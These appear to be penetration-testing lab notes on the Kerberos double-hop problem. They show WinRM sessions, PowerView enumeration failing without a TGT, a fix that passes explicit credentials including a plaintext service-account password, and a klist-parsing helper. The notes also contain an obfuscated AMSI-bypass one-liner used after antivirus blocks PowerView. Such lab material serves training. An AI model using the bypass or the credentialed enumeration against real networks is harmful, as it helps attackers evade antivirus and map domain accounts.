Kerberos Double Hop Problem
The Kerberos “Double Hop” problem appears when an attacker (or any user) authenticates to a first machine with Kerberos, for example over PowerShell/WinRM, and then tries to reach a second machine from there. The first hop only receives a service ticket for itself, not the user's TGT, so it cannot request tickets for the second hop (such as LDAP on the domain controller) on the user's behalf.
When the logon happens through Kerberos in this way, the user's credentials are not cached in memory on the first hop. Therefore, running mimikatz on that machine will not reveal the user's credentials, even though the user has processes running there.
*Evil-WinRM* PS C:\Users\backupadm\Documents> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\backupadm\Documents> get-domainuser -spn
Exception calling "FindAll" with "0" argument(s): "An operations error occurred.
"
At C:\Users\backupadm\Documents\PowerView.ps1:5253 char:20
+ else { $Results = $UserSearcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException
PS C:\Users\student98> Enter-PSSession -ComputerName dcorp-mgmt -Credential (Get-Credential)
cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents> Get-Process -IncludeUserName | Where-Object { $_.UserName -match "svcadmin" }
Handles WS(K) CPU(s) Id UserName ProcessName
------- ----- ------ -- -------- -----------
777 257396 3.39 3024 dcorp\svcadmin sqlservr
593 88236 0.63 3828 dcorp\svcadmin wsmprovhost
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::c25d:bab:73a4:80bc%6
IPv4 Address. . . . . . . . . . . : 172.16.4.44
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.4.254
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents> net user /domain
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
net : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents>
[dcorp-mgmt]: PS C:\program files> . ./PowerView.ps1
At C:\program files\PowerView.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
[dcorp-mgmt]: PS C:\program files> S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
[dcorp-mgmt]: PS C:\program files> . ./PowerView.ps1
[dcorp-mgmt]: PS C:\program files> Get-NetUser
Exception calling "FindAll" with "0" argument(s): "An operations error occurred.
"
At C:\program files\PowerView.ps1:23860 char:20
+ else { $Results = $Searcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException
[dcorp-mgmt]: PS C:\program files>
[dcorp-mgmt]: PS C:\program files> Invoke-CheckLocalAdminAccess
ComputerName IsAdmin
------------ -------
localhost True
[dcorp-mgmt]: PS C:\program files> Get-NetComputer
Exception calling "FindAll" with "0" argument(s): "An operations error occurred.
"
At C:\program files\PowerView.ps1:23860 char:20
+ else { $Results = $Searcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException
[dcorp-mgmt]: PS C:\program files> klist
Current LogonId is 0:0x380101
Cached Tickets: (2)
#0> Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
Server: dcorp-mgmt$ @
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/19/2025 5:49:20 (local)
End Time: 12/19/2025 6:04:20 (local)
Renew Time: 12/25/2025 21:01:46 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x4 -> S4U
Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
#1> Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
Server: HTTP/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/19/2025 3:25:46 (local)
End Time: 12/19/2025 13:25:46 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x8 -> ASC
Kdc Called:
[dcorp-mgmt]: PS C:\program files>
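As an added example (not code from the original notes), a PowerShell function that parses klist output like the listing above and reports whether the session holds a TGT, which is what decides if a second hop can succeed; Get-KerberosCacheState is an assumed name and the sample lines are constructed to match the listing.

```powershell
# Added example, not part of the original notes: parse klist output and say
# whether this logon session can make a second hop. Name and sample are mine.
function Get-KerberosCacheState {
    [CmdletBinding()]
    param(
        # Lines of klist output; by default read the live cache of this session
        [string[]]$KlistOutput = (klist 2>$null)
    )
    $tickets = @()
    $t = $null
    foreach ($line in $KlistOutput) {
        # Each cached ticket starts with "#N> Client: user @ REALM"
        if ($line -match '^#(\d+)>\s*Client:\s*(.+)$') {
            $t = [pscustomobject]@{
                Index      = [int]$Matches[1]
                Client     = $Matches[2].Trim()
                Server     = $null
                CacheFlags = $null
            }
            $tickets += $t          # $t is a reference, later lines fill it in
        }
        elseif ($t -and $line -match '^\s*Server:\s*(.*)$')      { $t.Server     = $Matches[1].Trim() }
        elseif ($t -and $line -match '^\s*Cache Flags:\s*(.*)$') { $t.CacheFlags = $Matches[1].Trim() }
    }

    # A TGT shows up as a ticket for krbtgt/<REALM>. Without one the session
    # holds only the tickets it was handed (S4U/ASC), which is the double hop.
    $hasTgt = [bool]($tickets | Where-Object { $_.Server -like 'krbtgt/*' })
    $diag = if ($hasTgt) { 'TGT cached: Kerberos can authenticate to a second hop' } else { 'No TGT cached (double hop): queries to other hosts need -Credential' }

    [pscustomobject]@{
        HasTgt    = $hasTgt
        Diagnosis = $diag
        Tickets   = $tickets
    }
}

# Constructed sample in the shape of the klist listing above (no TGT present)
$sample = @(
    'Cached Tickets: (2)',
    '#0>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL',
    '        Server: dcorp-mgmt$ @',
    '        Cache Flags: 0x4 -> S4U',
    '#1>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL',
    '        Server: HTTP/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL',
    '        Cache Flags: 0x8 -> ASC'
)
(Get-KerberosCacheState -KlistOutput $sample).Diagnosis   # reports the double hop
```

Run Get-KerberosCacheState with no arguments inside the remote session to check the live cache; if HasTgt is false, the LDAP queries above will keep failing until credentials are passed explicitly.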
Troubleshoot
Thus the solution is to specify the -Credential flag: PowerView then authenticates to the domain controller with the supplied credentials instead of relying on the session's missing Kerberos TGT.
[dcorp-mgmt]: PS C:\program files> $SecPassword = ConvertTo-SecureString '*ThisisBlasphemyThisisMadness!!' -AsPlainText -Force
[dcorp-mgmt]: PS C:\program files> $Cred = New-Object System.Management.Automation.PSCredential('DOLLARCORP.MONEYCORP.LOCAL\svcadmin', $SecPassword)
[dcorp-mgmt]: PS C:\program files> get-domainuser -spn -credential $Cred | select samaccountname
samaccountname
--------------
krbtgt
websvc
svcadmin
[dcorp-mgmt]: PS C:\program files> get-netuser -credential $Cred | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
sqladmin
websvc
srvadmin
appadmin
svcadmin
etc....